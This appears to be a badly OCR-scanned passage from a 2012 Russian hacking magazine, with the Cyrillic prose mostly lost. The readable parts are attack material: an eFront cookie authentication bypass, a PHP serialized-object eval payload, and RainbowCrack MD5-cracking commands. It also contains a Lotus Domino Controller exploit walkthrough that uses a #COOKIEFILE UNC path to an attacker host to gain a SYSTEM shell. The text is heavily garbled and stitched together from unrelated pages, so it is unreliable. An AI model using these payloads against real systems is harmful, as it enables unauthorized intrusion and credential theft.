GET /efront /www/index.php /1.1 Host: localhost Cookie: cookie_login=admin;cookie_login=1;cookie_ login=administrator;cookie_login=1;cookie_password=1 Connection : keep-alive
5. -. /www/s tudent.php:
if (isset($_GET[ ' course' ]) 11 isset($_GET[ 'from_course' ]))
if ($_GET[ 'course' ])
}
$course new EfrontCourse($_GET[ 'course ' ]); else {
$course new EfrontCourse($_GET[ ' from_course' ]);
$eligibility = $course - > checkRules( $_SESSION[ ' s_login' ]) ;
, $_GET['couse'] $_GE['from_ couse'J. EfrontCourse, , evalll :
/s tudent.php?lessons_ID=1&course[id]=1&course [directions_ID]=1&course[rules]=a: 1 :{s: 19 : "1]; phpinfo();die; /* " ;a: 1 :{s: : "lesson" ;i : e ;}}
if.1;1dJt1 Ft
I Radeon 4850 2 n
2,2 !
n MD5 n n
.
bjt.Jy/yEhdi -
RainbowCack n n ! .
bjt.[y/viSB9K -n ~> .
[iog.chivavas.org[
n n MD5.
, . -, ,
,
. , , MD5. .
:
, . , .
. -
l l , . .
MD5.
MD5 1 28- . , 1 28- , . 1991
- MD4. 1992 RFC 1321. MD5 , CMS
- SSL-. , MD5 , 1993 .
, . , 1996-, , MD5. , ,
SHA 1 [ , , SHA21 RIPEMD-160.
MD5 1 2004 . CetainKey Cyptosystems MD5CRK -
. - . 24 2004 , - ,
01 /156/20 12 www.epidemz.net
~ ' ( ' 'jiJI:fl(,(; ,,
'" " . ~
" 1 -~' 4 t.'1 ),J ., f lt, ' !1: . 1 l't ~
;t (.,J ~ "'
1.' ~ ili \!
- - ..
l! ~t b Pl l illtt llt
~ 16(t6)c: t0 t1t.72fOc:t!d6~c:99 !110 11t4.S:p.fi blj bb7a!45140~ 503t!3ecc:Et!tt533bll R.) bHc:07bc:073!1!5t!!1Hd15H841tb 49!.:61 0 o~ t70c:6datd72c:561at7dsttc:to 6c!sl oe ~htp2 ftl 7 !I)t2fd142212C.H99!d05ttt8b9H d04:ny2V
pltintt rc:ot 16Et6Sc:t041 a72!0c: t!di79!c:99 fd0 1s de45;:'16 pltltlttltt of 7t!45H0450b31 !38c:c:6!!t~533blt 11 dHht UO pl l iflttat c f bHc:0~013fi8518!4!dt SH84ltb is p49!r.67
pla illtet ot 02470
Linux . n : LN/ NTLM, MD5 SHA1. , - .
> . 3 MD5, SHA1, LM NTLM.
, >> . : LN/NTLM, MD5 SHA1- 200 . .
tg, RainbowCack. n :
hash_algoithm-aop [LM, NTLM, MD5 SHA1);
chaset- , chaset . txt;
plaitext_le_m i plaintext_len_max- ; tae_idex, chain_le, chain_um t_ind- , [it.ly/dT8M).
n: 1. tae_index- >> ,
. , .
2. chain_le- n . 3. hin_um- n . 4. pat_index-o , .
[ 0). >> MD5:
rtgen.exe md5 loweralpha-numeric 1 7 zeee 9755489
, . ltel Atom N450
:). md5_ lowealpha-numeic#1-7 _0_200097505489 _.t 1,5 .
, . n
tsot.exe:
rtsort.exe md5_loweralpha-numeric#l-7_e_zeeex975e5489_e.rt
l . : d8578edf8458ceefbc5ba58c5ca4. cack_gui.exe
Add Hash ... File . . >> . Seach Rainbow s ... Rainbow .
, md5_loweralpha-numeric#l-7_e_zeeex975135489_e.rt, Open. n !
.
VS. CPU VS. GPU , , lghashgpu n D5- , , RainbowCack
01/156/2012
MD5
>> . n.
MDCack, CPU [ ).
GPU [nVidia GeFoce GT 220), CPU [lntel Atom N450, ) ~
GPU CPU 4 ee:ee:el ee :ee:el ::l 5 :: : :9 : :l
::l ee:es:21 : : 1 7 ee::ll 9:27:52 ::4
, CPU , GPU >> . , ,
. , , 4- 5- ,
n . ,
. , - .
. -, , MD5 SHA1. - SHA2 S
[ ). -, .
>> . - , . , 100 %, . ::::
063 www.epidemz.net
EJ Plugtns RDP ots tist
Ftles .-6 setttnas
Hack the Planeti
www.epidemz.net
Spy .... f! Anti.&i..Rud
FF -binjW: Q Op
www.epidemz.net
Spy ... , Installer
----------conflo.php -------------,
-
-(forCP):
ll'!y5QL
lnl itle :~CN" "Your JavaSctipt ls tumed off. Please, enaieyoo >o:::'c:J:::s_ ---:--'=:...:;:= ,. .,...., ._~ID.ot--1
~- ( III .. ">!.J18)' ) YDUI"Javakrlplla lwodorf. PI8aaa , a~.yowJ&.,...a, a"*~~..-: con.
to[y- e.-ano,t;rt~ -Co~"'",..JI*""'
~ ( IINI8t1o011!YC.I'P8"'"'Y ) YowJavaScriptl8t .. .,.dofi. Piea , anablly-JS ~h l P18a. an111 .. ..-. -~ntf-CO811nl:ti'J'~"J' (
Y-JavaSc.pel8t,.Ndotf. PI8"a, ana. v-Js Plea , e~~terp.~oword WWWI'IDVI\1~ l ,twJt,oonl
intitle:"CN" "YourJavaSaipt ls tumed off. Please. e~bl!_~ ~
www.epidemz.net
, Digital Security ltwitter.com/asin tsovl
Lotus,
IBM Lotus Domino Server -
IBM Lotus Software,
IBM Lotus Notes.
www.zerodayiitia tive.com - ZD I; www:ii)m.com/soft-ware/ru/lotus/ -IBM Lotus Software; buatraq.ru - BugTraq; dj .navexDress.com -DJ Java Decompiler. LOTUS DOMINO CONTROLLER , , , .
.
. IBM, . , , Lotus. . . Lotus
: , , . . , ,
. , , , .
Lotus . : ] - , , ames.nsf - .
, , Lotus 8.5.2FP2. , exploit-db.com .
BugTaq , ZDI, IBM suit- . , , ,
068
. ,
, . . - , .: ]
CVE-2011-1519 , ,
[ , ]. , ZDI ZDI-11-110,
Oday ( ]. :
. .
UNC, . , SYSTEM>>.
: ~ COOKIEFILE
, \\evi lhost\passwod_coo kie_file, . , , . .
, , 2050. , Lotus . .
, . , ,
, nmap.
Ltus-, , ,
. :
socket:reconnect_ssl()
socket:send( "#API\n" ) socket:send( ( "#UI %s,%s\n " ):format(user,pass) socket:receive_lines( l )
socket:send( "#EXI\n" )
, Ltus- : SSL- ,
#>>. , admin pass
#UI admin,pass. , , nmap
COOKIEFILE . , , #COOKIEFILE \\evil\ file. , , [ ,
! .
- . , Java, IDA , - . DJ decompile [membes.
Nt-
01 /156/2012
Lotus,
fotunec i ty. com/neshkov/dj . htm l l, j- :\ gm Files\IBM\Lotus\Domino\Data\domino\java\dconsole.ja n Jv- . , NewCiient.class, .
:
11 sl- 2ese/tcp if(sl.equals( "#EXIT" ))
return 2;
i f (sl. equals( "#COOKIEFILE" )) if(stringtokenizer.hasMoreTokens())
11 . : // #COOKIEFILE < n >
cookieFilename = stringtokenizer.nextToken().trim(); return 7;
if(! l.equals ( "#UI" )) if(stringtokenizer .hasMoreTokens())
11 ... usr = stringtokenizer.nextToken( "," ).trim();
if (usr == null) return 4 ;
if(stringtokenizer.hasMoreTokens()) 11 , pwd = stringtokenizer.nextToken().trim();
return ;
. :
/* */ do{
/ / ReadFromUser- int i = ReadFromUser();
if(i == ) { // #APPLET appletConnection = true ; continue;
userinfo = UserManager.findUser(usr); if(userinfo == null) {
/1 . .. ! WriteToUser( "NOT_REG_AOMIN" ); continue;
if(!appletConnection) // #APPLET, fiag=vrfyPwd.verifyUserPassword(pwd,userinfo.userPWD());
else // #APPLET / 1 COOKIE? !
fiag = verifyAppletUserCookie(usr, pwd);
} while ( true); // end loop if(fiag) // ,
// , !
, #APPLET #UI #COOKIEFILE. , , ,
069 www.epidemz.net
admindata.xml. , no n, [ NOT_REG_ADMIN !' whoami NT AUTHORITY\SYSTEM
C:\Lotus\Domino\data>
n , n n . , n #API , API Jv-, -
, ncat . , Lotus , n SMBRelay.
? , . ?
, -. -,
c-..-.. ~no
'" ........... C'adlf.Ctt.&........Joo Lqou-os.Fn,OJOcc:OII c ... ,..nw,_,...
C...tllll~ll:
..._, L.,~ D~l'1to ,07 0c
S- ? , , UNC ( , !.
, - . , IBM
, : cookiefile .>> . ,
- \\evil\cookie\file, , : .\\evil\cookie\ file, UNC . , SSL-,
. . IBM! , cookief ile,
, - L- L- . XM L,
' , , IBM, L- :
c ?xml version= "1 . 0" encoding= "UTF-8" ?> cuser name= "admin" cookie= "dsecrg" address= "dsecrg" >
:
Bla-a-acuser name= "admin" xXXxcookie= "dsecrg"Xaddress= " dsecrg"NYA>
>>
. : 1. cookievalues Microsoft I
service ( \\n- Entel:
ncat targethost 49152 GET /
Mar licq 884888, http://snipper.rul
,., .. , ... ....
: scarletO URL: bit .ly/t l56m2 :
""""' .... Windows
-
MSSQL lnjection Helper- , n SQL-
. ,
n MSSQL. ,
n n n SQL-.
: Microsoft SQL Server; GUI-
;
; ; , ;
n ; ;
;
. , ' MSSQL lnjection Helper
, , URL [, site .com/script.asp?id =11 .
072
:
URL:
3. 14.y/r u/md5 : Win dows
D5-
?
BarsWF- World Fastest MD5 cracker.
n , 5-
. ? npor : +
; + -
n; + ;
MD5; ; . u :
1. . n, lntel 2 Quad QX6700 [3,01 GHzl
200 n '
2. Radeon: